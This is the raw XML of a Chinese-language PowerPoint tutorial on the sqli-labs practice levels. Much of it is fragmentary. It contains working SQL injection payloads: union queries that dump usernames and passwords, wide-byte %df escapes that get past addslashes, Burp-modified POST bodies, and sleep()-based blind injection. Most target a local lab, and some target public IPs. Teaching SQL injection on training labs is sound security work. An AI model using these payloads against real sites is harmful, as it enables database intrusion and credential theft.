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3"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="416" r:id="rId3"/>
    <p:sldId id="259" r:id="rId4"/>
    <p:sldId id="301" r:id="rId5"/>
    <p:sldId id="372" r:id="rId6"/>
    <p:sldId id="375" r:id="rId7"/>
    <p:sldId id="376" r:id="rId8"/>
    <p:sldId id="284" r:id="rId9"/>
    <p:sldId id="283" r:id="rId10"/>
    <p:sldId id="374" r:id="rId11"/>
    <p:sldId id="273" r:id="rId12"/>
    <p:sldId id="285" r:id="rId13"/>
    <p:sldId id="286" r:id="rId14"/>
    <p:sldId id="288" r:id="rId15"/>
    <p:sldId id="287" r:id="rId16"/>
    <p:sldId id="289" r:id="rId17"/>
    <p:sldId id="290" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="292" r:id="rId22"/>
    <p:sldId id="295" r:id="rId23"/>
    <p:sldId id="294" r:id="rId24"/>
    <p:sldId id="293" r:id="rId25"/>
    <p:sldId id="296" r:id="rId26"/>
    <p:sldId id="302" r:id="rId27"/>
    <p:sldId id="281" r:id="rId28"/>
    <p:sldId id="297" r:id="rId29"/>
    <p:sldId id="298" r:id="rId30"/>
    <p:sldId id="299" r:id="rId31"/>
    <p:sldId id="300" r:id="rId32"/>
    <p:sldId id="304" r:id="rId33"/>
    <p:sldId id="303" r:id="rId34"/>
    <p:sldId id="305" r:id="rId35"/>
    <p:sldId id="306" r:id="rId36"/>
    <p:sldId id="308" r:id="rId37"/>
    <p:sldId id="307" r:id="rId38"/>
    <p:sldId id="309" r:id="rId39"/>
    <p:sldId id="311" r:id="rId40"/>
    <p:sldId id="310" r:id="rId41"/>
    <p:sldId id="314" r:id="rId42"/>
    <p:sldId id="315" r:id="rId43"/>
    <p:sldId id="369" r:id="rId44"/>
    <p:sldId id="323" r:id="rId45"/>
    <p:sldId id="378" r:id="rId46"/>
    <p:sldId id="379" r:id="rId47"/>
    <p:sldId id="380" r:id="rId48"/>
    <p:sldId id="381" r:id="rId49"/>
    <p:sldId id="324" r:id="rId50"/>
    <p:sldId id="325" r:id="rId51"/>
    <p:sldId id="326" r:id="rId52"/>
    <p:sldId id="328" r:id="rId53"/>
    <p:sldId id="327" r:id="rId54"/>
    <p:sldId id="317" r:id="rId55"/>
    <p:sldId id="329" r:id="rId56"/>
    <p:sldId id="330" r:id="rId57"/>
    <p:sldId id="331" r:id="rId58"/>
    <p:sldId id="332" r:id="rId59"/>
    <p:sldId id="333" r:id="rId60"/>
    <p:sldId id="334" r:id="rId61"/>
    <p:sldId id="335" r:id="rId62"/>
    <p:sldId id="336" r:id="rId63"/>
    <p:sldId id="343" r:id="rId64"/>
    <p:sldId id="342" r:id="rId65"/>
    <p:sldId id="341" r:id="rId66"/>
    <p:sldId id="340" r:id="rId67"/>
    <p:sldId id="339" r:id="rId68"/>
    <p:sldId id="344" r:id="rId69"/>
    <p:sldId id="338" r:id="rId70"/>
    <p:sldId id="318" r:id="rId71"/>
    <p:sldId id="345" r:id="rId72"/>
    <p:sldId id="319" r:id="rId73"/>
    <p:sldId id="346" r:id="rId74"/>
    <p:sldId id="347" r:id="rId75"/>
    <p:sldId id="348" r:id="rId76"/>
    <p:sldId id="320" r:id="rId77"/>
    <p:sldId id="382" r:id="rId78"/>
    <p:sldId id="383" r:id="rId79"/>
    <p:sldId id="349" r:id="rId80"/>
    <p:sldId id="321" r:id="rId81"/>
    <p:sldId id="362" r:id="rId82"/>
    <p:sldId id="365" r:id="rId83"/>
    <p:sldId id="363" r:id="rId84"/>
    <p:sldId id="364" r:id="rId85"/>
    <p:sldId id="366" r:id="rId86"/>
    <p:sldId id="385" r:id="rId87"/>
    <p:sldId id="384" r:id="rId88"/>
    <p:sldId id="367" r:id="rId89"/>
    <p:sldId id="368" r:id="rId90"/>
    <p:sldId id="370" r:id="rId91"/>
    <p:sldId id="386" r:id="rId92"/>
    <p:sldId id="377" r:id="rId93"/>
    <p:sldId id="387" r:id="rId94"/>
    <p:sldId id="371" r:id="rId95"/>
    <p:sldId id="393" r:id="rId96"/>
    <p:sldId id="395" r:id="rId97"/>
    <p:sldId id="394" r:id="rId98"/>
    <p:sldId id="396" r:id="rId99"/>
    <p:sldId id="397" r:id="rId100"/>
    <p:sldId id="398" r:id="rId101"/>
    <p:sldId id="403" r:id="rId102"/>
    <p:sldId id="400" r:id="rId103"/>
    <p:sldId id="401" r:id="rId104"/>
    <p:sldId id="404" r:id="rId105"/>
    <p:sldId id="373" r:id="rId106"/>
    <p:sldId id="405" r:id="rId107"/>
    <p:sldId id="406" r:id="rId108"/>
    <p:sldId id="407" r:id="rId109"/>
    <p:sldId id="408" r:id="rId110"/>
    <p:sldId id="409" r:id="rId111"/>
    <p:sldId id="410" r:id="rId112"/>
    <p:sldId id="411" r:id="rId113"/>
    <p:sldId id="412" r:id="rId114"/>
    <p:sldId id="415" r:id="rId115"/>
    <p:sldId id="414" r:id="rId116"/>
    <p:sldId id="413" r:id="rId117"/>
    <p:sldId id="392" r:id="rId118"/>
    <p:sldId id="391" r:id="rId119"/>
    <p:sldId id="390" r:id="rId120"/>
    <p:sldId id="389" r:id="rId121"/>
    <p:sldId id="388"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4660" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="69" d="100"/>
          <a:sy n="69" d="100"/>
        </p:scale>
        <p:origin x="85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90785-7D2C-453F-9A84-95CC288BD253}"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96845-F88F-4A6C-9048-28C959745DD1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12991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196845-F88F-4A6C-9048-28C959745DD1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288252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8932558" y="5870575"/>
            <a:ext cx="1600200" cy="377825"/>
          </a:xfrm>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863583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7657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78897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12346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684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83048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51325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0457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70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42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116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6742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36994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86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152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6658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1251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dirty="0"/>
              <a:t>                                            </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>                                                                                                      crow</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D0363-82E4-42FB-BE47-2DDD4EBD23A0}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/11/19</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8483588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www.w3school.com.cn/php/func_mysql_real_escape_string.as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cnblogs.com/lcamry/p/5762905.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127.0.0.1/sqli/Less-39/?id=1"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127.0.0.1/sqli/Less-40/?id=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sqli/Less-2/?id=1"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27.0.0.1/sqli/Less-3/?id=1"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127.0.0.1/sqli/Less-8/?id=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row_821@163.com&#65292;&#25110;&#32773;&#26159;&#22312;&#24494;&#20449;&#20844;&#20247;&#21495;&#65306;&#20044;&#40486;&#23433;&#208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crow821/crowse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b51.net/article/125607.htm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.jb51.net/article/125599.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wn.php.cn/PhpStudy20180211.zip" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Audi-1/sqli-lab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crow_821@163.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127.0.0.1/sqli/Less-23/?id=1'--" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli/Less-23/?id=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121.199.30.46/Less-23/?id=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cnblogs.com/annsshadow/p/5037667.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nblogs.com/annsshadow/p/5037667.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ianshu.com/p/76d41b3a078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ianshu.com/p/3fe7904683ac" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnblogs.com/cute-puli/p/11145758.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nblogs.com/blogs-1024/p/11128999.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anshu.com/p/2ad3edf3c61f"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127.0.0.1/sqli/Less-25/?id=1"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127.0.0.1/sqli/Less-25a/?id=1"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127.0.0.1/sqli/Less-26/?id=1'--" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli/Less-26/?id=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w3school.com.cn/tags/html_ref_urlencode.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127.0.0.1/sqli/Less-26a/?id=1&#8217;);%00" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli/Less-26a/?id=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47.100.118.240:8888/Less-27/?id=1';%00" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://47.100.118.240:8888/Less-27/?id=1"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47.100.118.240:8888/Less-27/?id=1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://47.100.118.240:8888/Less-27a/?id=1" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://47.100.118.240:8888/Less-27a/?id=1%22;%0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47.100.118.240:8888/Less-28a/?id=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127.0.0.1/sqli/Less-1/?id=1"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cnblogs.com/lcamry/p/5762961.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blog.csdn.net/heiseweiye/article/details/82723478" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.csdn.net/helloc0de/article/details/76180190" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mytju.com/classcode/tools/urldecode_gb2312.asp"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tp://121.199.30.46/Less-32/?id=1%df%27" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://127.0.0.1/sqli/Less-32/?id=1"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127.0.0.1/sqli/Less-33/?id=1%df'--" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3school.com.cn/php/func_string_addslashe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284B-BA3B-4EFE-ADC8-365BC6DB3FE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3532908" y="1908850"/>
            <a:ext cx="5126183" cy="2421464"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-labs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>系列教程</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74386D1E-6AE1-4CC8-8B67-5FDAD4B82937}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7800107" y="4635114"/>
            <a:ext cx="3089566" cy="1114522"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>By: Crow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>never get anywhere</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20993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0" y="1634836"/>
            <a:ext cx="12192000" cy="4793674"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>7. http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,column_name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查询列信息，或者是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-1/?id=-1’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查看所以的列信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>8. http://127.0.0.1/sqli/Less-1/?id=-1‘ union select 1,2,concat_ws(’~‘,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> limit 1,1--+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>查询一个账号和密码，或者是：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-1/?id=-1’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a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11272141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同样通过代码可知，本关也使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数，理论上我们可以使用前几关中的宽字节注入的方法进行测试，但是测试的时候发现，方法并不奏效。（主要原因是因为我们不能够直接在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中传入数据，因为会被再次编码）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>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endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3966312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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>注意，在复制的时候要将单引号重新打出来，因为在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ppt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中总会因为奇怪的格式出现错误</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中传入的数据： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>�\‘ union select 1,2# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（注意：在这里不能够再使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--+ --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>空格等这样的注释符，我们推荐使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>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我们首先在使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>进行抓包之后，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>bp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>中修改信息得到返回信息即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们本来传入的数据： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>a%df</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>但是我们抓包之后的数据： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a%25df%2527&amp;passwd=a%25df%2527&amp;submit=Submit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们可以发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>经过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>转换之后为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>%25</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>所以我们需要在拦截数据包之后将数据进行修改：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=a%df%27&amp;passwd=a%df%27&amp;submit=Submit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>接下来就是正常的注入流程。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35803459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其实本关和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>34</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>基本相同，我们首先分析一下代码：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>$id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>check_addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>($_GET[‘id’]);  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>首先还是对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的值进行过滤处理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>=“SELECT * FROM users WHERE id=$id LIMIT 0,1”; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在这个位置中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>值没有经过单引号的包裹，所以我们只要在注入的时候防止我们构造的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>注入句子中避免单引号等即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>法一： 联合查询注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-35/?id=-1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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>法二：延时注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/sqli/Less-35/?id=1 and  if( length(database())=1, 1, sleep(5)    )#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通过这样的方式进行判断。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1284225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02888"/>
            <a:ext cx="12067309" cy="5840109"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"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我们首先进行源代码审计，发现代码中使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>函数（参考：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.w3school.com.cn/php/func_mysql_real_escape_string.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>我们此处尝试直接使用原来的宽字节注入：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>http://127.0.0.1/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/Less-36/?id=1%df’ # </a:t>
            </a:r>
